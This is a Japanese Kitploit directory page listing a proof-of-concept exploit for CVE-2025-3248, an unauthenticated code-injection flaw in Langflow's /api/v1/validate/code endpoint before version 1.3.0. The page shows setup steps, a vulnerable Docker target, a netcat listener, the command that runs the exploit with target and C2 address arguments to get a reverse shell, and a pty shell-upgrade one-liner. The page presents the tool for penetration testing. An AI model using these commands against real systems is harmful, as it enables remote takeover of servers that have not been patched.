Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-3248 — Langflow のバージョン <1.3.0 で RCE を達成するための PoC | Kitploit
ツール/GitHubGitHub/wand3rlust/cve-2025-3248
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストコマンド&コントロールペイロード開発
GitHubwand3rlust/cve-2025-3248

CVE-2025-3248

Langflow のバージョン <1.3.0 で RCE を達成するための PoC

リポジトリを見る
7ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-3248

はじめに

Langflow 1.3.0 より前のバージョンは、Python の exec() 関数を介した /api/v1/validate/code エンドポイントにおける認証なしのコードインジェクションの影響を受けます。このエクスプロイトは、この脆弱性を悪用してリバースシェル接続を確立します。

使い方

設定

root@kitploit:~
git clone https://github.com/wand3rlust/CVE-2025-3248.git
cd CVE-2025-3248/
python3 -m venv venv
. venv/bin/activate
pip install -r requirements.txt

脆弱アプリ

root@kitploit:~
docker pull langflowai/langflow:1.1.4
docker run -p 7860:7860 langflowai/langflow:1.1.4

実行

root@kitploit:~
# Terminal 1
nc -nvlp <C2_PORT>

# Terminal 2
python3 cve-2025-3248.py <TARGET_URL> <C2_IP> <C2_PORT>

例: python3 cve-2025-3248.py http://10.10.10.1:7860 10.0.13.37 1337

注: シェルをTTYにアップグレードするには、シェルを取得した後に以下のコマンドを実行してください。

python -c 'import pty; pty.spawn("/bin/bash")'

デモ

デモ

参照

  • アドバイザリ: https://nvd.nist.gov/vuln/detail/CVE-2025-3248
  • GitHub: https://github.com/langflow-ai/langflow/security/advisories/GHSA-rvqx-wpfh-mfx7
  • 元のエクスプロイト: https://www.exploit-db.com/exploits/52262
ツールをダウンロード